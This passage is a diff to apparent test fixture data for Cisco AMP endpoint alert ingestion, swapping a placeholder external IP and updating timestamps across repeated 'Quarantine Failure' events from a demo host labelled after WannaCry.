pending\"},\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"8.8.8.8\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"identity\":{\"sha256\":\"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa\"}}}}",
+ "ingested": "2021-12-09T13:35:39.763848400Z",
+ "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6419303574240494000,\"timestamp\":1610652551,\"timestamp_nanoseconds\":664000000,\"date\":\"2021-01-14T19:29:11+00:00\",\"event_type\":\"Quarantine 
Failure\",\"event_type_id\":2164260880,\"detection_id\":\"6419303569945526293\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"error\":{\"error_code\":3221225558,\"description\":\"Delete pending\"},\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"81.2.69.144\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"identity\":{\"sha256\":\"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa\"}}}}",
 "code": "2164260880",
 "kind": "alert",
 "action": "Quarantine Failure",
@@ -1191,7 +1191,7 @@
 }
 ],
 "connector_guid": "test_connector_guid",
- "external_ip": "8.8.8.8"
+ "external_ip": "81.2.69.144"
 },
 "file": {
 "disposition": "Malicious",
@@ -1236,7 +1236,7 @@
 "ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"
 ],
 "ip": [
- "8.8.8.8",
+ "81.2.69.144",
 "10.10.10.10"
 ]
 },
@@ -1246,8 +1246,8 @@
 },
 "event": {
 "severity": 2,
- "ingested": "2021-09-30T00:14:44.025238376Z",
- "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6419303574240494000,\"timestamp\":1610652551,\"timestamp_nanoseconds\":664000000,\"date\":\"2021-01-14T19:29:11+00:00\",\"event_type\":\"Quarantine Failure\",\"event_type_id\":2164260880,\"detection_id\":\"6419303569945526292\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"error\":{\"error_code\":3221225558,\"description\":\"Delete pending\"},\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"8.8.8.8\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"identity\":{\"sha256\":\"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa\"}}}}",
+ "ingested": "2021-12-09T13:35:39.763852200Z",
+ "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6419303574240494000,\"timestamp\":1610652551,\"timestamp_nanoseconds\":664000000,\"date\":\"2021-01-14T19:29:11+00:00\",\"event_type\":\"Quarantine 
Failure\",\"event_type_id\":2164260880,\"detection_id\":\"6419303569945526292\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"error\":{\"error_code\":3221225558,\"description\":\"Delete pending\"},\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"81.2.69.144\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"identity\":{\"sha256\":\"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa\"}}}}",
 "code": "2164260880",
 "kind": "alert",
 "action": "Quarantine Failure",
@@ -1267,7 +1267,7 @@
 }
 ],
 "connector_guid": "test_connector_guid",
- "external_ip": "8.8.8.8"
+ "external_ip": "81.2.69.144"
 },
 "file": {
 "disposition": "Malicious",
@@ -1312,7 +1312,7 @@
 "ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"
 ],
 "ip": [
- "8.8.8.8",
+ "81.2.69.144",
 "10.10.10.10"
 ]
 },
@@ -1322,8 +1322,8 @@
 },
 "event": {
 "severity": 2,
- "ingested": "2021-09-30T00:14:44.025240785Z",
- "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6419303574240494000,\"timestamp\":1610652551,\"timestamp_nanoseconds\":664000000,\"date\":\"2021-01-14T19:29:11+00:00\",\"event_type\":\"Quarantine Failure\",\"event_type_id\":2164260880,\"detection_id\":\"6419303569945526291\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"error\":{\"error_code\":3221225558,\"description\":\"Delete pending\"},\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"8.8.8.8\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"identity\":{\"sha256\":\"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa\"}}}}",
+ "ingested": "2021-12-09T13:35:39.763857100Z",
+ "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6419303574240494000,\"timestamp\":1610652551,\"timestamp_nanoseconds\":664000000,\"date\":\"2021-01-14T19:29:11+00:00\",\"event_type\":\"Quarantine 
Failure\",\"event_type_id\":2164260880,\"detection_id\":\"6419303569945526291\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"error\":{\"error_code\":3221225558,\"description\":\"Delete pending\"},\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"81.2.69.144\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"identity\":{\"sha256\":\"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa\"}}}}",
 "code": "2164260880",
 "kind": "alert",
 "action": "Quarantine Failure",
@@ -1343,7 +1343,7 @@
 }
 ],
 "connector_guid": "test_connector_guid",
- "external_ip": "8.8.8.8"
+ "external_ip": "81.2.69.144"
 },
 "file": {
 "disposition": "Malicious",
@@ -1388,7 +1388,7 @@
 "ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"
 ],
 "ip": [
- "8.8.8.8",
+ "81.2.69.144",
 "10.10.10.10"
 ]
 },
@@ -1398,8 +1398,8 @@
 },
 "event": {
 "severity": 2,
- "ingested": "2021-09-30T00:14:44.025243063Z",
- "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6419303574240494000,\"timestamp\":1610652551,\"timestamp_nanoseconds\":664000000,\"date\":\"2021-01-14T19:29:11+00:00\",\"event_type\":\"Quarantine Failure\",\"event_type_id\":2164260880,\"detection_id\":\"6419303569945526288\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"error\":{\"error_code\":3221225558,\"description\":\"Delete pending\"},\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"8.8.8.8\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"identity\":{\"sha256\":\"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa\"}}}}",
+ "ingested": "2021-12-09T13:35:39.763863200Z",
+ "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6419303574240494000,\"timestamp\":1610652551,\"timestamp_nanoseconds\":664000000,\"date\":\"2021-01-14T19:29:11+00:00\",\"event_type\":\"Quarantine 
Failure\",\"event_type_id\":2164260880,\"detection_id\":\"6419303569945526288\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"error\":{\"error_code\":3221225558,\"description\":\"Delete pending\"},\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"81.2.69.144\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"identity\":{\"sha256\":\"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa\"}}}}",
 "code": "2164260880",
 "kind": "alert",
 "action": "Quarantine Failure",
@@ -1419,7 +1419,7 @@
 }
 ],
 "connector_guid": "test_connector_guid",
- "external_ip": "8.8.8.8"
+ "external_ip": "81.2.69.144"
 },
 "file": {
 "disposition": "Malicious",
@@ -1464,7 +1464,7 @@
 "ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"
 ],
 "ip": [
- "8.8.8.8",
+ "81.2.69.144",
 "10.10.10.10"
 ]
 },
@@ -1474,8 +1474,8 @@
 },
 "event": {
 "severity": 2,
- "ingested": "2021-09-30T00:14:44.025245294Z",
- "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6419303574240494000,\"timestamp\":1610652551,\"timestamp_nanoseconds\":664000000,\"date\":\"2021-01-14T19:29:11+00:00\",\"event_type\":\"Quarantine Failure\",\"event_type_id\":2164260880,\"detection_id\":\"6419303569945526287\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"error\":{\"error_code\":3221225558,\"description\":\"Delete pending\"},\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"8.8.8.8\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"identity\":{\"sha256\":\"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa\"}}}}",
+ "ingested": "2021-12-09T13:35:39.763869300Z",
+ "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6419303574240494000,\"timestamp\":1610652551,\"timestamp_nanoseconds\":664000000,\"date\":\"2021-01-14T19:29:11+00:00\",\"event_type\":\"Quarantine 
Failure\",\"event_type_id\":2164260880,\"detection_id\":\"6419303569945526287\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"error\":{\"error_code\":3221225558,\"description\":\"Delete pending\"},\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"81.2.69.144\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"identity\":{\"sha256\":\"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa\"}}}}",
 "code": "2164260880",
 "kind": "alert",
 "action": "Quarantine Failure",
@@ -1495,7 +1495,7 @@
 }
 ],
 "connector_guid": "test_connector_guid",
- "external_ip": "8.8.8.8"
+ "external_ip": "81.2.69.144"
 },
 "file": {
 "disposition": "Malicious",
@@ -1540,7 +1540,7 @@
 "ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"
 ],
 "ip": [
- "8.8.8.8",
+ "81.2.69.144",
 "10.10.10.10"
 ]
 },
@@ -1550,8 +1550,8 @@
 },
 "event": {
 "severity": 2,
- "ingested": "2021-09-30T00:14:44.025247539Z",
- "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6419303574240494000,\"timestamp\":1610652551,\"timestamp_nanoseconds\":664000000,\"date\":\"2021-01-14T19:29:11+00:00\",\"event_type\":\"Quarantine Failure\",\"event_type_id\":2164260880,\"detection_id\":\"6419303569945526286\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"error\":{\"error_code\":3221225558,\"description\":\"Delete pending\"},\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"8.8.8.8\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"identity\":{\"sha256\":\"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa\"}}}}",
+ "ingested": "2021-12-09T13:35:39.763875400Z",
+ "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6419303574240494000,\"timestamp\":1610652551,\"timestamp_nanoseconds\":664000000,\"date\":\"2021-01-14T19:29:11+00:00\",\"event_type\":\"Quarantine 
Failure\",\"event_type_id\":2164260880,\"detection_id\":\"6419303569945526286\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"error\":{\"error_code\":3221225558,\"description\":\"Delete pending\"},\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"81.2.69.144\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"identity\":{\"sha256\":\"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa\"}}}}",
 "code": "2164260880",
 "kind": "alert",
 "action": "Quarantine Failure",
@@ -1571,7 +1571,7 @@
 }
 ],
 "connector_guid": "test_connector_guid",
- "external_ip": "8.8.8.8"
+ "external_ip": "81.2.69.144"
 },
 "file": {
 "disposition": "Malicious",
@@ -1616,7 +1616,7 @@
 "ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"
 ],
 "ip": [
- "8.8.8.8",
+ "81.2.69.144",
 "10.10.10.10"
 ]
 },
@@ -1626,8 +1626,8 @@
 },
 "event": {
 "severity": 2,
- "ingested": "2021-09-30T00:14:44.025249744Z",
- "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6419303574240494000,\"timestamp\":1610652551,\"timestamp_nanoseconds\":664000000,\"date\":\"2021-01-14T19:29:11+00:00\",\"event_type\":\"Quarantine Failure\",\"event_type_id\":2164260880,\"detection_id\":\"6419303565650558988\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"error\":{\"error_code\":3221225558,\"description\":\"Delete pending\"},\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"8.8.8.8\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"identity\":{\"sha256\":\"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa\"}}}}",
+ "ingested": "2021-12-09T13:35:39.763882300Z",
+ "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6419303574240494000,\"timestamp\":1610652551,\"timestamp_nanoseconds\":664000000,\"date\":\"2021-01-14T19:29:11+00:00\",\"event_type\":\"Quarantine 
Failure\",\"event_type_id\":2164260880,\"detection_id\":\"6419303565650558988\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"error\":{\"error_code\":3221225558,\"description\":\"Delete pending\"},\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"81.2.69.144\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"identity\":{\"sha256\":\"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa\"}}}}",
 "code": "2164260880",
 "kind": "alert",
 "action": "Quarantine Failure",
@@ -1647,7 +1647,7 @@
 }
 ],
 "connector_guid": "test_connector_guid",
- "external_ip": "8.8.8.8"
+ "external_ip": "81.2.69.144"
 },
 "file": {
 "disposition": "Malicious",
@@ -1692,7 +1692,7 @@
 "ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"
 ],
 "ip": [
- "8.8.8.8",
+ "81.2.69.144",
 "10.10.10.10"
 ]
 },
@@ -1702,8 +1702,8 @@ }, "event": { "severity": 2, - "ingested": "2021-09-30T00:14:44.025251965Z", - "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6419303574240494000,\"timestamp\":1610652551,\"timestamp_nanoseconds\":664000000,\"date\":\"2021-01-14T19:29:11+00:00\",\"event_type\":\"Quarantine Failure\",\"event_type_id\":2164260880,\"detection_id\":\"6419303565650558989\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"error\":{\"error_code\":3221225558,\"description\":\"Delete pending\"},\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"8.8.8.8\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"identity\":{\"sha256\":\"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa\"}}}}", + "ingested": "2021-12-09T13:35:39.763886500Z", + "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6419303574240494000,\"timestamp\":1610652551,\"timestamp_nanoseconds\":664000000,\"date\":\"2021-01-14T19:29:11+00:00\",\"event_type\":\"Quarantine 
Failure\",\"event_type_id\":2164260880,\"detection_id\":\"6419303565650558989\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"error\":{\"error_code\":3221225558,\"description\":\"Delete pending\"},\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"81.2.69.144\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"identity\":{\"sha256\":\"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa\"}}}}", "code": "2164260880", "kind": "alert", "action": "Quarantine Failure", @@ -1723,7 +1723,7 @@ } ], "connector_guid": "test_connector_guid", - "external_ip": "8.8.8.8" + "external_ip": "81.2.69.144" }, "file": { "disposition": "Malicious", @@ -1768,7 +1768,7 @@ "ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa" ], "ip": [ - "8.8.8.8", + "81.2.69.144", "10.10.10.10" ] }, 
@@ -1778,8 +1778,8 @@ }, "event": { "severity": 2, - "ingested": "2021-09-30T00:14:44.025254167Z", - "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6419303574240494000,\"timestamp\":1610652551,\"timestamp_nanoseconds\":664000000,\"date\":\"2021-01-14T19:29:11+00:00\",\"event_type\":\"Quarantine Failure\",\"event_type_id\":2164260880,\"detection_id\":\"6419303565650558987\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"error\":{\"error_code\":3221225558,\"description\":\"Delete pending\"},\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"8.8.8.8\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"identity\":{\"sha256\":\"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa\"}}}}", + "ingested": "2021-12-09T13:35:39.763891900Z", + "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6419303574240494000,\"timestamp\":1610652551,\"timestamp_nanoseconds\":664000000,\"date\":\"2021-01-14T19:29:11+00:00\",\"event_type\":\"Quarantine 
